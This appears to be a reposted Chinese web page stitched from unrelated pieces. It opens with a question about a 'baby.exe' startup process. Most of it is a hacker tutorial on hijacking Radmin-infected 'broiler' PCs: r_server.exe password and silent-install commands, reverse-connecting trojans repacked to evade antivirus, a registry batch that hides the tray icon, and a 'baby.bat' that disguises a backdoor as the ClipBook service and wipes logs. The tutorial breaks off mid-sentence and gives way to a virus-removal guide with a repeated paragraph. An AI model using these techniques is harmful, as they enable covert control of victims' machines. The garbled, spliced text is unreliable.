系統啟動時加載的程序

2019-09-10 09:09:18

字體：大中小

來源：轉載

供稿：網友

很是奇怪,我啟動系統的時候,一進windows視窗的時候,馬上開任務管理器,會看到一個baby.exe的程序閃一下就沒了,搜索文件(包括隱藏文件和系統文件)沒有發現有次程序用任何看開機啟動項目的軟件也都沒發現有這個程序(注冊表和msconfig里直接看開機項目也沒有),用了AVG Anti-Spyware和卡巴掃描系統分區也沒有發現任何病毒和木馬.但是就是每次開機,包括重啟,馬上開任務管理器看就有此程序閃下就沒. 有無高手告訴我該如何找出并且刪除4899肉雞對于4899肉雞,相信大家都不會陌生吧。Radmin遠程控制軟件最大的優點就是功能齊全，便于操作，能夠躲避一些軟件的查殺。實在是居家旅行，殺人滅口，絕好武器。那么……有的朋友要問了多么好的寶馬良駒在哪里可以找到啊？問的好，各大黑客網站均能下載，童叟無欺啊！第一章 4899空口令肉雞爭奪戰 4899空口令肉雞是由一些超級菜鳥們用Windows NT/2000 自動攻擊探測機對他感興趣的某段IP細心的，無微不至的掃描孕育而生的~~~(鼓掌,有請我們今天的主角,4899空口令肉雞隆重登場,哎呀,誰拿西紅柿扔我?忒不講公德呢?扔也不扔個紅的，綠的怎么吃啊?) 既然4899空口令肉雞這個多，那么偶就先從它的由來說起吧！Windows NT/2000 自動攻擊探測機這款掃描軟件不但集成了掃描器的特點，還添加了一些漏洞的利用功能。它能夠對掃描出IIS溢出的，弱口令的和SA空口令的電腦上傳并安裝遠程圖形控制軟件Radmin，即把R_Server.exe，AdmDll.dll和raddrv.dll這三個文件上傳到其電腦系統跟目錄%systemroot%/system32子目錄下，并行運行R_Server.exe可執行文件。由于遠程上傳的Radmin沒有經過配置，因此在對方機子的任務欄里出現了Radmin 服務程序的托盤(如圖1-1)。這樣不就成個此地無銀三百兩，機器的主人一定能發現這個不正常的托盤。我想他第一個動作就是把鼠標移動到托盤位置，一點就顯示出了有某某IP正在連接本機。如果是個只知道上網聊天的MM她第一個動作就是把網斷了，逃過別人的控制再說。如果是個有經驗的老鳥那么各位就要小心了，他會通過顯示出的IP查到你的電腦或者你用來掃描的肉雞，這樣就大大的不妙了。所以了，這個托盤的隱藏是非常必要和急切的。在做我們的工作之前，要做好一些準備活動。首先把4899空口令肉雞設置上密碼，在Radmin的CMD控件下輸入命令r_ server.exe /port:520 /pass:hackbase /save /silence。有些同僚總是抱怨這個命令不好用，我看過他們出問題的動畫。無論是在CMD命令下或者在"運行"下輸入這個命令都是正確的，而他們出錯的原因就是沒有添加參數"/save"保存，和參數"/silence"后臺安裝。這樣設置好連接端口和密碼，同道中人就算用"4899空口令掃描器"掃到你做的肉雞也晚了，偶已經添加過密碼了，而端口在肉雞重起后能夠修改成功。接下來我們就要把一個反彈木馬放到肉雞上，以免對方是動態IP，肉雞就飛掉了。這里我們可以用灰鴿子VIP或黑洞2004 這兩個反彈木馬都很不錯的哦~~~。順便說一句您的木馬一定要做過特征碼修改或者加殼啊，這樣能夠躲避對方殺毒軟件的查殺。在這里再說句題外話對木馬加殼不是加的殼越多就越安全的，這樣大家就走入了多加殼的誤區。這樣不但不能躲過殺毒軟件的查殺，還有可能使木馬的功能受到影響。對喜歡加殼躲殺毒軟件的朋友偶建議下先把木馬脫殼，然后再加個不知名的殼（ASPack, UPX這些加殼軟件的殼已經被有些殺毒軟件列入黑客程序列表了），然后在用幾款世面流行的殺毒軟件在本地機器事先做個放殺毒檢測。這樣的黑客程序才是我們的殺手锏。前期工作制作完畢后，您就可以耐心的工作了。為了做到隱藏托盤的目的，偶想了兩個辦法：第一，在您的機器上事先安裝并配置好Radmin，把注冊表中的HKEY_LOCAL_MACHINE/SYSTEM/RAdmin導出為radmin.reg，這個就是絕對符合您意愿的Radmin配置，把radmin.reg上傳到對方機器輸入命令regedit /s radmin.reg。這樣在機器重起或者您幫助他重起Radmin服務的時候，任務欄里的Radmin托盤就消失了。第二，寫個批處理文件重新調整Radmin配置。批處理文件內容如下： @echo off @r_server.exe /port:520 /pass:hackbase /save /silence echo Windows Registry Editor Version 5.00 >ftp.reg echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters] >>ftp.reg echo "DisableTrayIcon"=hex:01,00,00,00 >>ftp.reg regedit /s ftp.reg del ftp.reg 到這里菜鳥的"保雞"反擊戰已經告一段落。剛才我們不是還放了個灰鴿子嗎，這樣這臺肉雞上就有我們的兩匹寶馬良駒了。小樣讓你跑，還是逃不出如來佛的掌心吧！呵呵，我得意的笑~~~ 在長期的摸索研究工作中，偶發現個Windows NT/2000 自動攻擊探測機的小BUG。等偶慢慢道來，各位看官聽仔細啊。Radmin 3.0影子版的客戶端是Radmin公司開發的，而服務端程序缺因為種種原因，沒有和各位見面。有的說是Radmin公司在開發新的功能，服務端沒有開發完；有的說Radmin公司現在只對付費用戶提供服務端，這些偶就不得而知了。可是我們敬愛的影子為我們制造出了"Radmin 3.0服務端"其本質就是2.0 版本的部分修改，對其圖標做了修改和加殼處理。可是在漢化過程中，不知道什么原因，它在任務欄里的Radmin托盤變成了一個空白的地方，要是不注意是看不出來的（如圖1-2、1-3）。所以了，我們在運行Windows NT/2000 自動攻擊探測機掃描機子的時候，把它同目錄下釋放出來的R_Server.exe，替換成 3.0版本的R_Server.exe。這樣掃描出來上傳圖形控制軟件的機器，在其任務欄里就出現了一個空白的地方。當把鼠標點到上面的時候也沒有了某某IP正在連接的提示，這樣就欺騙了一些機主。呵呵，旁門左道大家不要見笑啊。可是這個小BUG啟發了我的另一個思路，就是把我們的Radmin.exe自動運行的配置包重命名為R_Server.exe，然后替換掉R_Server.exe，我們不就有了所以自己的機子了嗎？好，說干就干。把我的Radmin自解壓包替換掉R_Server.exe，可是這回 Windows NT/2000 自動攻擊探測機就沒有了上傳成功的小提示。（如圖： 1-4）（廣告過后更精彩）我一直對這個驗證方法不甚了解，想找作者問問，可是他老人家還換QQ了。哪位高手有高見，請不吝賜教，偶的QQ：9500142。言歸正傳，那也難不倒我，我們把掃描出來有漏洞的所有IP復制到一個文本文件中，用superscan導入IP列表，掃描我設置Radmin服務的端口，這樣被我上傳Radmin的機器就都上門報道了。Yeah!（如圖：1-5）第二章 Radmin 服務端高級配置既然我們對Radmin這么情有獨鐘，那么我們就要打造不死系的超級后門木馬。具推斷當前安裝過 Radmin控制軟件的肉雞占安全性低級的電腦的80%左右，所以我們上傳木馬之前，要把其系統中可能存在的Radmin服務停止掉，替換成我們的服務為己所用。絕大部分的安裝Radmin的肉雞都是用的R_Server.exe程序。可是種植的原始情況分為兩種：第一就如上面所說那樣，是用Windows NT/2000 自動攻擊探測機上傳安裝的，其安裝服務的名稱為"radmm"。啟動和停止該服務的命令分別為"net start radmm"和"net stop radmm"。第二一些喜歡偷懶的朋友，把自己的Radmin是默認的R_Server.exe程序，其安裝服務的名稱為"Remote Administrator Service"。啟動和停止該服務的命令分別為"net start r_server"和"net stop r_server"。偶發現一個對付這兩種配置的小竅門，就是可以用"r_server.exe /start"和"r_ server.exe /stop"啟動和停止服務，然后我們在替換為自己的配置。 Follow Me！對配置Radmin自解壓程序的，我有兩個思路可供大家參詳，希望對您能配置能夠有所啟發和幫助. 第一就是替換系統服務的方法。如果您對Windows系統服務的工作機理不甚了解，那么請跳過這里，看接下來的第二種配置. 1、編寫一個批處理文件，命名為 first.bat -------------------------------------------- @echo off r_server.exe /stop -------------------------------------------- 這樣做是假定肉雞上已經由黑友安裝過Radmin服務，殺無赦。 2、接下來我拿系統的ClipBook服務開刀做下替換。編寫一個批處理文件，命名為baby.bat -------------------------------------------- @echo off @sc stop ClipBook @sc delete ClipBook @sc stop r_server @del %systemroot%/system32/AdmDll.dll @del %systemroot%/system32/raddrv.dll @del %systemroot%/system32/R_Server.exe @del %systemroot%/system32/dllcache /ClipSrv.exe @del %systemroot%/system32/ClipSrv.exe @copy %systemroot%/system32/Setup/ClipSrv.exe %systemroot% /system32/ClipSrv.exe @copy %systemroot%/system32/Setup/raddrv.dll %systemroot%/system32/raddrv.dll @copy % systemroot%/system32/Setup/AdmDll.dll %systemroot%/system32/AdmDll.dll @ClipSrv.exe /install /silence @regedit /s radmin.reg @regedit /s server.reg @sc config ClipBook start=auto @sc start ClipBook @sc delete r_server @del radmin.reg @del server.reg @del sc.exe @clss.exe @cls @del baby.exe @shutdown.exe -f -r @del first.bat @del baby.bat @del clss.exe @del shutdown.exe -------------------------------------------- Radmin.reg 注冊表文件時服務配置,Sc是微軟服務修改程序(比爾其實對我們還滿不錯的哦，嘿嘿)，clss.exe是日志清除工具(大家要養成勤掃地的習慣噢！)，shutdown.exe是關機程序,這個程序無關緊要，關鍵看您的性子怎么樣了（急性子的黑友建議使用）。Server.reg就是ClipBook服務的描述信息了，要偽裝當然要做的夠專業啊。 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/ClipSrv] "Description"="啟用"剪貼簿查看器"儲存信息并與遠程計算機共享。如果此服務終止，"剪貼簿查看器" 將無法與遠程計算機共享信息。如果此服務被禁用，任何依賴它的服務將無法啟動。" "DisplayName"="ClipBook" 上面的信息是由原ClipBook服務所對應的注冊表鍵值 [HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/ClipSrv] 提取出來的。因為分支包含了部分電腦路徑和安全信息，每個電腦都有些許區別，所以把精煉的東西提取出來做為我們的偽裝信息。然后，把我們所用到的工具、注冊表文件、批處理文件打包。配置RAR高級自解壓格式所選項嘀時候，注意那個解壓路徑寫成%systemroot%/system32/Setup這個目錄直接看對oduxyym.exe病毒的手工清除方法：最近出現了一種病毒，極其討厭，通過映像劫持技術和雙進程技術是機器幾乎無法工作。大概現象為：　　運行很多程序都無法啟動，觀察系統進程只是多了oduxyym.exe veckdld.exe兩個進程。這時候，你就種病毒了，建議在進行修復操作前關閉其他所有的無關程序，斷開網絡連接，并建議將以下內容復制粘貼到記事本保存后以便操作。　　首先：我們斷開網絡第一件事就是打開任務管理器，關閉多余的進程，XP一般只剩18個進程為正常，其他多余的所有進程需要關閉，oduxyym.exe veckdld.exe這兩個進程關閉不了的時候，可以通過關閉EXPLROR .EXE后將看不到桌面，沒關系，這時即可將oduxyym.exe veckdld.exe兩個進程結束，然后再通過任務管理器的：文件-新建任務，打開C:/WINDOWS/EXPLROR.EXE，即可看到桌面，這時候就好辦了，就是麻煩點。開始-運行：regedit回車，進入注冊表：　　[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RUN]將下列啟動項刪除： C:/WINDOWS/system32/.exe（默認，將此項清除即可） C:/WINDOWS/system32/oduxyym.exe（整字符串刪除） C:/WINDOWS/system32/veckdld.exe（整字符串刪除） C:/WINDOWS/system32/svpecld.exe（整字符串刪除）然后，看到啟動項差不多干凈之后，再查看映像劫持下面的東東　　打開注冊表的：[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options]下面查看所有的*.exe的所有項，如果右邊的值為：C:/WINDOWS/system32/oduxyym.exe的，請將整項刪除（你會發現會有很多很多，慢慢的操作，細心點，別誤操作），做完上邊的工作，你就可以重啟機器了，重啟后進安全模式，將下面的命令以記事本另存為.bat的文件，雙擊運行即可清理系統中的病毒文件。然后，看到啟動項差不多干凈之后，再查看映像劫持下面的東東　　打開注冊表的：[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options]下面查看所有的*.exe的所有項，如果右邊的值為：C:/WINDOWS/system32/oduxyym.exe的，請將整項刪除（你會發現會有很多很多，慢慢的操作，細心點，別誤操作），做完上邊的工作，你就可以重啟機器了，重啟后進安全模式，的文件，雙擊運行即可清理系統中的病毒文件。將上面的步驟做完后，重啟機器，升級殺軟全盤殺毒，卸載重新安裝ＱＱ，下載Windows清理助手升級更新后清理系統： http://www.arswp.com/download/arswp/arswp.rar 　　另外，最近用USB設備傳播的病毒越來越多,建議關閉自動播放功能,用一些工具進行免疫. 使用USB設備前先殺毒下面是oduxyym病毒清除工具：附件：oduxyym病毒清除.bat

上一篇：液晶顯示器的保養技巧

下一篇：ICHATX.EXE是什么意思？